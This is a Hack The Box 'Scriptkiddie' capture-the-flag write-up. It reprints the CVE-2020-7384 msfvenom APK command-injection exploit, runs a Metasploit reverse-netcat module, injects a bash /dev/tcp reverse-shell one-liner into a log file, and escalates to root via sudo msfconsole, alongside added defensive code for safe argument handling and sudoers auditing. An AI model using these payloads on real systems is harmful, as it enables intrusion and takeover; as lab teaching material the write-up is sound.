Welcome to my write-up for Hack The Box — Scriptkiddie.
I recently started taking notes on my machine/box completions so I can publish write-ups, and I have really started to enjoy it. Most of the completed write-ups cover machines that are still active, which means I am unfortunately not allowed to publish them yet.
Nmap
sudo nmap -sC -sV -O -A 10.10.10.226 -v
Starting Nmap 7.91 ( <https://nmap.org> ) at 2021-04-06 13:13 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating Ping Scan at 13:13
Scanning 10.10.10.226 [4 ports]
Completed Ping Scan at 13:13, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:13
Completed Parallel DNS resolution of 1 host. at 13:13, 0.04s elapsed
Initiating SYN Stealth Scan at 13:13
Scanning 10.10.10.226 [1000 ports]
Discovered open port 22/tcp on 10.10.10.226
Discovered open port 5000/tcp on 10.10.10.226
Completed SYN Stealth Scan at 13:13, 0.64s elapsed (1000 total ports)
Initiating Service scan at 13:13
Scanning 2 services on 10.10.10.226
Completed Service scan at 13:13, 6.93s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.226
Retrying OS detection (try #2) against 10.10.10.226
Retrying OS detection (try #3) against 10.10.10.226
Retrying OS detection (try #4) against 10.10.10.226
Retrying OS detection (try #5) against 10.10.10.226
Initiating Traceroute at 13:14
Completed Traceroute at 13:14, 0.04s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:14
Completed Parallel DNS resolution of 2 hosts. at 13:14, 0.04s elapsed
NSE: Script scanning 10.10.10.226.
Initiating NSE at 13:14
Completed NSE at 13:14, 1.17s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.14s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Nmap scan report for 10.10.10.226
Host is up (0.033s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: k1d'5 h4ck3r t00l5
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/6%OT=22%CT=1%CU=37488%PV=Y%DS=2%DC=T%G=Y%TM=606C4279
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Uptime guess: 40.043 days (since Thu Feb 25 11:12:32 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 33.91 ms 10.10.14.1
2 30.26 ms 10.10.10.226
NSE: Script Post-scanning.
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
Raw packets sent: 1124 (53.482KB) | Rcvd: 1081 (46.718KB)
Looking at the ports, we see that ports 22 and 5000 are open. Port 22 is SSH, so let's take a note of that for later. Port 5000 is an HTTP service (Werkzeug 0.16.1 on Python 3.8.5) and looks like the interesting one.
Browsing to http://10.10.10.226:5000/ shows a web page offering a few "hacker" features, as you can see below.
Gobuster
sudo gobuster dir -u <http://10.10.10.226> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
Gobuster gave us nothing, but a quick google-fu session turned up the following exploit, which looks promising!
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: <https://www.metasploit.com/>
# Software Link: <https://www.metasploit.com/>
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode
# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'
# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()
tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"
# Touch empty_file
open(empty_file, "w").close()
# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])
# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
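The PoC above works because msfvenom copied the template APK's certificate subject into a shell command string: the single quote at the start of the CN closes the quoted -dname operand, and everything after it runs as shell. The block below is an added example written for this write-up, not code from the exploit author or from Metasploit. The helper names, the benign DN and the shortened payload body (aWQ=, base64 of "id") are my own. It shows a pre-check for shell metacharacters in a DN taken from an untrusted APK, the unsafe string-building shape next to the argv-list form, and shlex.quote as the fallback when a shell string is unavoidable.

```python
"""Added example: why the -dname injection works and how to call keytool safely.
Not part of the original write-up or of Metasploit."""
import re
import shlex

# DN in the shape used by the PoC above; payload body is a constructed value (aWQ= = "id").
MALICIOUS_DN = "CN='|echo aWQ= | base64 -d | sh #"
# A DN as a normal debug-signed APK would carry it (constructed).
BENIGN_DN = "CN=Android Debug, O=Android, C=US"

# Characters that change meaning once a string reaches /bin/sh unquoted.
SHELL_META = re.compile(r"""[;&|`$<>(){}\\'"\n]""")


def dn_has_shell_metachars(dn: str) -> bool:
    """Cheap pre-check for a certificate DN pulled from an untrusted file."""
    return SHELL_META.search(dn) is not None


def keytool_cmd_unsafe(keystore: str, alias: str, dname: str) -> str:
    """The vulnerable shape: the DN is interpolated into one shell string.
    A DN that begins with a quote terminates the literal early and the
    remainder is parsed as shell. Shown for contrast only; never execute it."""
    return f"keytool -genkey -keystore {keystore} -alias {alias} -dname '{dname}'"


def keytool_cmd_safe(keystore: str, alias: str, dname: str) -> list:
    """argv list for subprocess.run(argv, shell=False): the DN stays one
    argument no matter which characters it contains."""
    return ["keytool", "-genkey", "-keystore", keystore,
            "-alias", alias, "-dname", dname]


def keytool_cmd_quoted(keystore: str, alias: str, dname: str) -> str:
    """If a shell string is unavoidable, quote every operand with shlex.quote."""
    return " ".join(shlex.quote(a) for a in keytool_cmd_safe(keystore, alias, dname))


def shell_would_see(command: str):
    """Tokenise a command string the way a POSIX shell would.
    Returns None when quoting is unbalanced, which is exactly what the
    malicious DN produces in the unsafe form (the trailing ' is never closed)."""
    try:
        return shlex.split(command)
    except ValueError:
        return None


if __name__ == "__main__":
    for dn in (BENIGN_DN, MALICIOUS_DN):
        print(f"{dn!r}: shell metacharacters = {dn_has_shell_metachars(dn)}")
    print("unsafe form tokenises to:", shell_would_see(keytool_cmd_unsafe("/tmp/ks", "k", MALICIOUS_DN)))
    print("quoted form tokenises to:", shell_would_see(keytool_cmd_quoted("/tmp/ks", "k", MALICIOUS_DN)))
```

The argv-list form is the real fix; the metacharacter check is only a guard rail for code that must still pass a DN through a shell.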
Metasploit
Let us try a Metasploit exploit, we are looking for APK upload.
msfconsole
=[ metasploit v6.0.37-dev ]
+ -- --=[ 2115 exploits - 1136 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 > search apk
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal No Android Browser RCE Through Google Play Store XFO
1 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
2 auxiliary/dos/dns/bind_tsig_badtime 2020-05-19 normal No BIND TSIG Badtime Query Denial of Service
3 exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection 2020-10-29 excellent No Rapid7 Metasploit Framework msfvenom APK Template Command Injection
4 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE
5 exploit/windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow
6 exploit/windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
Interact with a module by name or index. For example info 6, use 6 or use exploit/windows/browser/webex_ucf_newobject
msf6 > use 3
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > options
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.apk yes The APK file name
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.178.117 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost tun0
lhost => tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
[+] msf.apk stored at /home/user/.msf4/local/msf.apk
Next, set up a listener.
nc -lvnp 4444
listening on [any] 4444 ...
Upload to the target site:
And we have a shell!
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 50734
whoami
kid
From here we can grab the user flag!
/kid
ls
html
logs
snap
user.txt
Next up, getting root! Going into /home we see two users, kid and pwn. In pwn's home directory there are two entries:
recon
scanlosers.sh
I tried to run scanlosers.sh but it didn't work, so I cat the file to see its code:
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
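The defect in the script above is that a value read from a world-writable log is spliced, unvalidated and unquoted, into an sh -c command line. As an added illustration (not part of the write-up or of the box), here is how that input handling should look, written in Python: the same third-field-onward convention as the cut invocation, but the value must parse as an IP address, and nmap is described as an argv list rather than a shell string. The sample log lines are constructed; the injected line is a shortened stand-in for the one used later in this write-up.

```python
"""Added example: a safe replacement for the input handling in scanlosers.sh.
Not part of the original write-up or the box."""
import ipaddress
import shlex


def parse_hackers_log(lines):
    """Return (accepted_ips, rejected_lines).

    Mirrors `cut -d' ' -f3- | sort -u` from the original script, but refuses
    anything that is not a literal IP address, which is all nmap should get."""
    accepted, rejected = set(), []
    for raw in lines:
        if not raw.strip():
            continue
        fields = raw.split(" ")            # cut -d' ' semantics: empty fields still count
        candidate = " ".join(fields[2:]).strip()
        try:
            accepted.add(str(ipaddress.ip_address(candidate)))
        except ValueError:
            rejected.append(raw)           # log it; never hand it to a shell
    return sorted(accepted), rejected


def nmap_argv(ip, recon_dir="recon"):
    """argv list for subprocess.Popen(argv, shell=False); `ip` is exactly one token."""
    return ["nmap", "--top-ports", "10", "-oN", f"{recon_dir}/{ip}.nmap", ip]


# Constructed sample of /home/kid/logs/hackers: entries in the shape the web app
# is assumed to write (timestamp, then the client IP) plus one injected line.
SAMPLE_LOG = [
    "[2021-04-06 13:20:01] 10.10.14.15",
    "[2021-04-06 13:20:07] 10.10.14.15",
    "[2021-04-06 13:21:44] 10.10.14.23",
    " ;/bin/bash -c 'id' #",
]

if __name__ == "__main__":
    ips, bad = parse_hackers_log(SAMPLE_LOG)
    for ip in ips:
        print("would run:", " ".join(shlex.quote(a) for a in nmap_argv(ip)))
    for line in bad:
        print("rejected:", repr(line))
```

Validating the value as an IP address also removes the need for the sh -c wrapper entirely; the redirections the original script used can be expressed with subprocess's stdout and stderr arguments.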
Reading the script: whenever it is triggered, it takes every line of /home/kid/logs/hackers, keeps the third space-separated field onwards (meant to be an IP address) and splices that value, unquoted, into an sh -c "nmap ..." command line before truncating the log. Nothing validates the value, so anyone who can write to that file gets command execution as the user the script runs as. The hackers file seems to be empty or unreadable to me, but that is not stopping me from writing to it. Let's make a reverse shell one-liner and put it in there. But before we do that, let's get a listener running.
nc -nlvp 1337
I’ve put in the following command next to overwrite the “hackers” file.
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.15/1337 0>&1' #" >> hackers
And our listener fires!
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 55350
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
What are our privileges as pwn?
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
We can run msfconsole as root via sudo, with no password. This will be easy!
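A rule like this is what a sudoers audit should catch: a NOPASSWD entry for a program that will happily run OS commands on the caller's behalf (msfconsole forwards unrecognised console input to the system, which is what the "[*] exec:" lines further down show). The helper below is added here for this write-up and is not part of it; it parses sudo -l output in the format shown above and flags such rules. The function names are mine, and of the SHELL_CAPABLE set only msfconsole comes from this page; the other entries are common examples I have added.

```python
"""Added example: flag sudo -l rules that grant a shell-capable binary without a password.
Not part of the original write-up."""
import re
from posixpath import basename

# (runas) TAG: TAG: /path/to/command [args]
SUDO_RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")

# Programs that execute arbitrary commands or files for their caller.
# msfconsole is taken from this write-up; the rest are common examples (my additions).
SHELL_CAPABLE = {"msfconsole", "vim", "vi", "less", "more", "find",
                 "python3", "perl", "bash", "sh"}


def parse_sudo_l(output: str):
    """Parse the rules section of `sudo -l` output into dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = SUDO_RULE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd")})
    return rules


def risky_rules(rules):
    """Rules that run as root, need no password, and start a shell-capable binary."""
    flagged = []
    for r in rules:
        binary = basename(r["cmd"].split()[0])
        runs_as_root = r["runas"].startswith("root") or r["runas"].startswith("ALL")
        if runs_as_root and "NOPASSWD" in r["tags"] and binary in SHELL_CAPABLE:
            flagged.append(r)
    return flagged


# The sudo -l output from this write-up, reproduced as sample input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
"""

if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"RISK: ({r['runas']}) {' '.join(r['tags'])} {r['cmd']}")
```

Run it against the output of sudo -l on each host during a build review; any hit means the rule grants root, not the single program it names.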
pwn@scriptkiddie:~$ sudo msfconsole
sudo msfconsole
=[ metasploit v6.0.9-dev ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use help <command> to learn more about any command
stty: 'standard input': Inappropriate ioctl for device
msf6 > cd /root
msf6 > ls
[*] exec: ls
root.txt
snap
msf6 > cat root.txt
[*] exec: cat root.txt
axxxxxxxxxxxxxxxxxxxxxxxxxxxxxx4